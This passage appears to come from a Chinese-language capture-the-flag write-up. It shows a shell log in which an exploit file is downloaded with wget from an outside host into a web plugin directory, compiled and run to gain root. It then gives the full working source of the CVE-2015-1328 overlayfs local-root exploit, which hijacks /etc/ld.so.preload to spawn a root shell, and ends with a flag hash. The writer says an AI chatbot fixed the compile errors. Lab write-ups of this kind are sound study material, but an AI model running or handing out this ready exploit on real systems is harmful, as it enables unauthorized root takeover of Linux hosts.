// reached by the wrapper and, after its own waitpid above, by the init
// child; neither continues into the installation code below
waitpid(init, &status, 0);
return 0;
}

// give the namespace children time to finish, then reap the wrapper
usleep(300000);

wait(NULL);

fprintf(stderr,"child threads done\n");

// O_WRONLY without O_CREAT: succeeds only if child_exec() left a writable
// /etc/ld.so.preload behind
fd = open("/etc/ld.so.preload",O_WRONLY);

if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}

fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
// `lib` is reused here for system()'s exit status
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
// 16 == strlen("/tmp/ofs-lib.so\n")
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
// not returned from on success; the LIB getuid() hook runs inside su
execl("/bin/su","su",NULL);
}

编译出错,最后调教g老师出了最终版

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.3.11:8083/37292.c
<.9/plugins/spellchecker$ wget http://192.168.3.11:8083/37292.c
--2024-10-16 05:33:46-- http://192.168.3.11:8083/37292.c
Connecting to 192.168.3.11:8083... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4083 (4.0K) [text/x-csrc]
Saving to: '37292.c'

100%[======================================>] 4,083 --.-K/s in 0s

2024-10-16 05:33:46 (634 MB/s) - '37292.c' saved [4083/4083]

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c config.php editor_plugin_src.js includes
changelog.txt css exp rpc.php
classes editor_plugin.js img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -D_GNU_SOURCE -o exp 37292.c
<.9/plugins/spellchecker$ cc -D_GNU_SOURCE -o exp 37292.c
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c config.php editor_plugin_src.js includes
changelog.txt css exp rpc.php
classes editor_plugin.js img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ chmod 777 exp
chmod 777 exp
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root

exp如下

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <dlfcn.h>

/* Source text of the preload library that main() writes to /tmp/ofs-lib.c
 * and compiles to /tmp/ofs-lib.so. It defines a replacement getuid(): when
 * the loading process has euid 0 and /proc/self/exe resolves to /bin/su it
 * unlinks /etc/ld.so.preload and /tmp/ofs-lib.so (so neither file is left
 * behind), sets uid/gid to 0 and exec's an interactive /bin/sh; in any other
 * process it forwards to the real getuid() located with dlsym(). */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

/* 1 MiB stack for the clone()'d child that runs child_exec(); main() passes
 * its top end (child_stack + 1024 * 1024), as the stack grows downward on
 * x86_64. */
static char child_stack[1024*1024];

/* Body of the clone()'d child; same logic as the exploit-db listing above,
 * reformatted and given an explicit return value. It runs inside the user
 * namespace unshared by main()'s wrapper and the mount namespace created by
 * CLONE_NEWNS, so the mount() calls are issued by an unprivileged user and
 * only succeed on kernels with the flaw named in the header (CVE-2015-1328).
 *
 * Step 1: overlay a kernel-owned directory (lower) on /tmp/ns_sploit/upper
 * (upper) and rename() a root-owned lower-layer file to ld.so.preload, which
 * leaves a copy of it in the upper directory.
 * Step 2: overlay /tmp/ns_sploit/upper (lower) on /etc (upper) and chmod()
 * that file through the overlay, which copies it up into /etc as a
 * world-writable /etc/ld.so.preload. main() checks for exactly that result.
 *
 * Each mount has a fallback for newer kernels that require the "overlay"
 * fstype and a workdir= option. `stuff` is unused. */
static int child_exec(void *stuff) {
char *file;
// start from an empty scratch tree; every path below lives under it
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper", 0777);
mkdir("/tmp/ns_sploit/o", 0777);

fprintf(stderr, "mount #1\n");
// MS_MGC_VAL is the legacy mount() magic value, i.e. no mount flags
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// newer kernels need the "overlay" fstype plus workdir=, and refuse /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
// lower-layer file to rename when the apparmor directory is the lower dir
file = ".access";
chmod("/tmp/ns_sploit/work/work", 0777);
} else {
// lower-layer file to rename when /proc/sys/kernel is the lower dir
file = "ns_last_pid";
}

chdir("/tmp/ns_sploit/o");
rename(file, "ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr, "mount #2\n");
// same mount pair as above, now with /etc as the upper directory
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work", 0777);
}

// chmod() on the lower-layer file makes overlayfs copy it up into /etc;
// 0777 is what lets main() later open it O_WRONLY as the unprivileged user
chmod("/tmp/ns_sploit/o/ld.so.preload", 0777);
umount("/tmp/ns_sploit/o");

return 0; // added return statement: the original fell off the end of a non-void function
}

/* Sets up the namespaces, runs child_exec() in them, then installs the
 * preload library. Same flow as the exploit-db listing above; this version
 * invokes `cc` instead of `gcc` and returns explicitly. The transcript shows
 * it being built with -D_GNU_SOURCE, which clone()/CLONE_* need.
 *
 * Process tree: main -> wrapper (fork; unshare(CLONE_NEWUSER)) -> init
 * (fork) -> clone(child_exec, CLONE_NEWNS). Each ancestor waits for its
 * child; main usleep()s 300 ms and then wait()s for the wrapper.
 *
 * Afterwards main treats a writable /etc/ld.so.preload as proof that the
 * overlay step worked, writes LIB to /tmp/ofs-lib.c, compiles it, writes
 * the .so path into ld.so.preload, removes the scratch tree and the .c file,
 * and execl()s /bin/su so the setuid binary picks the library up through
 * the loader's /etc/ld.so.preload handling.
 *
 * Host-side artifacts worth alerting on: creation or chmod 0777 of
 * /etc/ld.so.preload, the /tmp/ns_sploit tree, /tmp/ofs-lib.c and
 * /tmp/ofs-lib.so, a compiler run by an unprivileged service account, and
 * overlay mounts originating from an unprivileged user namespace.
 * argc/argv are unused. */
int main(int argc, char **argv) {
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr, "spawning threads\n");

if ((wrapper = fork()) == 0) {
// failure is only reported; execution continues regardless
if (unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if ((init = fork()) == 0) {
pid_t pid = clone(child_exec, child_stack + (1024 * 1024), clone_flags, NULL);
if (pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}

waitpid(pid, &status, 0);
}

// reached by the wrapper and, after its own waitpid above, by the init
// child; neither continues into the installation code below
waitpid(init, &status, 0);
return 0;
}

// give the namespace children time to finish, then reap the wrapper
usleep(300000);
wait(NULL);

fprintf(stderr, "child threads done\n");

// O_WRONLY without O_CREAT: succeeds only if child_exec() left a writable
// /etc/ld.so.preload behind
fd = open("/etc/ld.so.preload", O_WRONLY);
if (fd == -1) {
fprintf(stderr, "exploit failed\n");
exit(-1);
}

fprintf(stderr, "/etc/ld.so.preload created\n");
fprintf(stderr, "creating shared library\n");
lib = open("/tmp/ofs-lib.c", O_CREAT | O_WRONLY, 0777);
write(lib, LIB, strlen(LIB));
close(lib);
// `lib` is reused here for system()'s exit status
lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if (lib != 0) {
fprintf(stderr, "couldn't create dynamic library\n");
exit(-1);
}
// 16 == strlen("/tmp/ofs-lib.so\n")
write(fd, "/tmp/ofs-lib.so\n", 16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
// not returned from on success; the LIB getuid() hook runs inside su
execl("/bin/su", "su", NULL);

return 0; // added return statement; only reached if execl() fails
}

编译后赋权直接执行提权

image-20241016203719963

1  Alec told me to place the codes here: 

2 568628e0d993b1973adc718237da6e93

3 If you captured this make sure to go here.....
4 /006-final/xvf7-flag/